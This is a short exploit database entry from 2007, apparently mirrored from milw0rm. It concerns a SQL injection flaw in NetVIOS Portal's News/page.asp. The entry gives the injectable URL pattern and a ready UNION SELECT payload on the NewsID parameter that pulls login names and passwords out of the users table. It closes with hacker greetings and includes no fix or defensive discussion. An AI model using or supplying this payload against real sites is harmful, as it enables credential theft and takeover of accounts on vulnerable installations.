NetVIOS Portal - 'page.asp' SQL Injection

Author: parad0x
type: webapps
platform: asp
port: 
date_added: 2007-03-18  
date_updated: 2016-10-27  
verified: 1  
codes: OSVDB-30411;CVE-2007-1566;CVE-2006-5954  
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 3520.txt  
*******************************************************************************
# Title   :  NetVios Portal (page.asp) Remote SQL Injection Vulnerability
# Author  :  parad0x
# Contact :  :(
# D.Page  :  http://www.scriptaty.net/netvios-portal.html
# $$      :  Free
#S.Page : http://www.netvios.com
*******************************************************************************
http://[target]/[path]/News/page.asp?NewsID=[SQL]

Example:

//News/page.asp?NewsID=-1 union select 0,1,2,loginname,password,5,6,7 from users where userId=1

"""""""""""""""""""""
greetz : VoLqaN, x-MastER

"""""""""""""""""""""

# milw0rm.com [2007-03-19]